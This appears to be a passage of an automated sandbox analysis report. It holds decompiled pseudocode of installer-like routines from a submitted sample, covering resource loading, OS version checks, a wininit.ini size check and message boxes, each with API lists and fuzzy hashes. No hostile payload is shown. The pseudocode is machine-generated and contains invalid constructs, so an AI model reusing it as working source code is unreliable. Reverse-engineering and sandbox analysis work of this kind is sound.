                                                                                                                                                                                                                                                							_t40 = _t40 + 1;
                                                                                                                                                                                                                                                						} while (_t26 != 0);
                                                                                                                                                                                                                                                						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                                						_t46 = _t51;
                                                                                                                                                                                                                                                						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                                						 *0x10a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                                						_t30 = _v32();
                                                                                                                                                                                                                                                						if(_t51 != _t51) {
                                                                                                                                                                                                                                                							asm("int 0x29");
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_push(_t45);
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							_t36 = 0;
                                                                                                                                                                                                                                                							FreeResource(??);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							FreeResource();
                                                                                                                                                                                                                                                							_v36 = _v36 + 1;
                                                                                                                                                                                                                                                							E0010171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                                							_t46 = 0;
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					return E00106CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010171E: _vsnprintf.MSVCRT ref: 00101750
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001051CA,00000004,00000024,00102F71,?,00000002,00000000), ref: 001062CD
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001051CA,00000004,00000024,00102F71,?,00000002,00000000), ref: 001062D4
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001051CA,00000004,00000024,00102F71,?,00000002,00000000), ref: 0010631B
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00106345
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001051CA,00000004,00000024,00102F71,?,00000002,00000000), ref: 00106357
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                • Opcode ID: b19522553e46405fa0ec5568fae65bd49778315371112f1baec45ac5e2a053fc
                                                                                                                                                                                                                                                • Instruction ID: 59fb6b8c72cafcea450b1ba086b36cfe4907dfe0f3277d1fe746b5f8a10893ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b19522553e46405fa0ec5568fae65bd49778315371112f1baec45ac5e2a053fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D210571A00219ABDB149FA4DC459FFBB7CFF48710B004129F986A7681DBF59D528BE0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E0010681F(void* __ebx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                                				void* _v172;
                                                                                                                                                                                                                                                				int* _v176;
                                                                                                                                                                                                                                                				int _v180;
                                                                                                                                                                                                                                                				int _v184;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				long _t31;
                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t36 = __ebx;
                                                                                                                                                                                                                                                				_t19 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                                				_t41 =  *0x1081d8; // 0x0
                                                                                                                                                                                                                                                				_t43 = 0;
                                                                                                                                                                                                                                                				_v180 = 0xc;
                                                                                                                                                                                                                                                				_v176 = 0;
                                                                                                                                                                                                                                                				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                                					 *0x1081d8 = 0;
                                                                                                                                                                                                                                                					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                						_t41 =  *0x1081d8; // 0x0
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t41 = 1;
                                                                                                                                                                                                                                                						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t31 = RegQueryValueExA(_v172, 0x101140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                                							_t43 = _t31;
                                                                                                                                                                                                                                                							RegCloseKey(_v172);
                                                                                                                                                                                                                                                							if(_t31 != 0) {
                                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t40 =  &_v176;
                                                                                                                                                                                                                                                								if(E001066F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                                									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                                										 *0x1081d8 = _t41;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L12;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0010686E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 001068A7
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001068CC
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00101140,00000000,?,?,0000000C), ref: 001068F4
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00106902
                                                                                                                                                                                                                                                  • Part of subcall function 001066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0010691A), ref: 00106741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 001068C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                • Opcode ID: ea536c7de54cc7ce3d9296a87877b5851d725ce7ca1d325e25e31ae5d549018c
                                                                                                                                                                                                                                                • Instruction ID: 7a8f9a291caf0629d65d3bce7014f44bbc67259854749b4abc86b2aa452905ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea536c7de54cc7ce3d9296a87877b5851d725ce7ca1d325e25e31ae5d549018c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10316D31A003289FDB21DF21CC45BAAB7B8EF45768F0041A5E9C9A6580DBB09E95CF52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00103A3F(void* __eflags) {
                                                                                                                                                                                                                                                				void* _t3;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				CHAR* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t16 = "LICENSE";
                                                                                                                                                                                                                                                				_t1 = E0010468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                                				 *0x108d4c = _t3;
                                                                                                                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                                                                                                                					_t19 = _t16;
                                                                                                                                                                                                                                                					if(E0010468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                                						if(lstrcmpA( *0x108d4c, "<None>") == 0) {
                                                                                                                                                                                                                                                							LocalFree( *0x108d4c);
                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                							 *0x109124 = 0;
                                                                                                                                                                                                                                                							return 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t9 = E00106517(_t19, 0x7d1, 0, E00103100, 0, 0);
                                                                                                                                                                                                                                                						LocalFree( *0x108d4c);
                                                                                                                                                                                                                                                						if(_t9 != 0) {
                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x109124 = 0x800704c7;
                                                                                                                                                                                                                                                						L2:
                                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					LocalFree( *0x108d4c);
                                                                                                                                                                                                                                                					 *0x109124 = 0x80070714;
                                                                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                				 *0x109124 = E00106285();
                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00102F64,?,00000002,00000000), ref: 00103A5D
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00103AB3
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 00103AD0
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00103B13
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: FindResourceA.KERNEL32(00100000,000007D6,00000005), ref: 0010652A
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: LoadResource.KERNEL32(00100000,00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00106538
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: DialogBoxIndirectParamA.USER32(00100000,00000000,00000547,001019E0,00000000), ref: 00106557
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: FreeResource.KERNEL32(00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00106560
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00103100,00000000,00000000), ref: 00103AF4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                • Opcode ID: 6803a75e01a54788be1c13109dd232805d8bcce56e0f24bcbb273ed2be191051
                                                                                                                                                                                                                                                • Instruction ID: b0c414119d05fd2fed80532d7db25690f9035ea2b72ad1db938eb622f3427373
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6803a75e01a54788be1c13109dd232805d8bcce56e0f24bcbb273ed2be191051
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD11E6B0301201ABD724AF76AC19E177ABDEFE9710B10462EB6C1D69F1DFF988508760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E001024E0(void* __ebx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t7;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				long _t26;
                                                                                                                                                                                                                                                				signed int _t27;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 = __ebx;
                                                                                                                                                                                                                                                				_t7 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                                				_t25 = 0x104;
                                                                                                                                                                                                                                                				_t26 = 0;
                                                                                                                                                                                                                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                					E0010658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                                					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                                					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                                					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                                						_lclose(_t25);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00102506
                                                                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0010252C
                                                                                                                                                                                                                                                • _lopen.KERNEL32 ref: 0010253B
                                                                                                                                                                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0010254C
                                                                                                                                                                                                                                                • _lclose.KERNEL32(00000000), ref: 00102555
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                • Opcode ID: 31bdabfad5f8ab67be27ccf80f510116fcfc2c50b67a4a6953e0247494aeb09a
                                                                                                                                                                                                                                                • Instruction ID: 065da04232121cae089a495f66e54087f2165473bae4914bbd74f2f7c6773d7f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31bdabfad5f8ab67be27ccf80f510116fcfc2c50b67a4a6953e0247494aeb09a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E019E326002286BD7209B659C0CEDBBB7CEF85760F400155FAC9D3194DBB48E868AA5
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E001036EE(CHAR* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                                				signed int _v420;
                                                                                                                                                                                                                                                				signed int _v424;
                                                                                                                                                                                                                                                				CHAR* _v428;
                                                                                                                                                                                                                                                				CHAR* _v432;
                                                                                                                                                                                                                                                				signed int _v436;
                                                                                                                                                                                                                                                				CHAR* _v440;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t72;
                                                                                                                                                                                                                                                				CHAR* _t77;
                                                                                                                                                                                                                                                				CHAR* _t91;
                                                                                                                                                                                                                                                				CHAR* _t94;
                                                                                                                                                                                                                                                				int _t97;
                                                                                                                                                                                                                                                				CHAR* _t98;
                                                                                                                                                                                                                                                				signed char _t99;
                                                                                                                                                                                                                                                				CHAR* _t104;
                                                                                                                                                                                                                                                				signed short _t107;
                                                                                                                                                                                                                                                				signed int _t109;
                                                                                                                                                                                                                                                				short _t113;
                                                                                                                                                                                                                                                				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x108184 = 1;
						 *0x108180 = 1;
						L13:
						 *0x109a40 = _t119;
						L14:
						__eflags =  *0x108a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00102A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00102A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x108a38 & 0x00000001;
											if(( *0x108a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0010681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E001067C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L58;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                                										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                                											goto L30;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t138;
                                                                                                                                                                                                                                                										if(_t138 == 0) {
                                                                                                                                                                                                                                                											goto L66;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t135 = 0;
                                                                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                                                                										goto L44;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									L37:
                                                                                                                                                                                                                                                									_t129 = _v432;
                                                                                                                                                                                                                                                									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                                									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                                										goto L66;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t133 =  &_v268;
                                                                                                                                                                                                                                                									_t104 = E001028E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                                									__eflags = _t104;
                                                                                                                                                                                                                                                									if(_t104 != 0) {
                                                                                                                                                                                                                                                										goto L66;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t135 = _v428;
                                                                                                                                                                                                                                                									_t133 = 0x54d;
                                                                                                                                                                                                                                                									_t138 = 0x54d;
                                                                                                                                                                                                                                                									goto L40;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L33;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t91;
                                                                                                                                                                                                                                                							if(_t91 > 0) {
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t123;
                                                                                                                                                                                                                                                							if(_t123 != 0) {
                                                                                                                                                                                                                                                								__eflags = _t91;
                                                                                                                                                                                                                                                								if(_t91 != 0) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                                								L27:
                                                                                                                                                                                                                                                								if(__eflags <= 0) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								L28:
                                                                                                                                                                                                                                                								__eflags = _t135;
                                                                                                                                                                                                                                                								if(_t135 == 0) {
                                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t138 = 0x54c;
                                                                                                                                                                                                                                                								goto L30;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t91;
                                                                                                                                                                                                                                                							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                                							if(_t91 != 0) {
                                                                                                                                                                                                                                                								_t131 = _v424;
                                                                                                                                                                                                                                                								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                                								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                                							_t109 = _v424;
                                                                                                                                                                                                                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                                							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                                							goto L27;
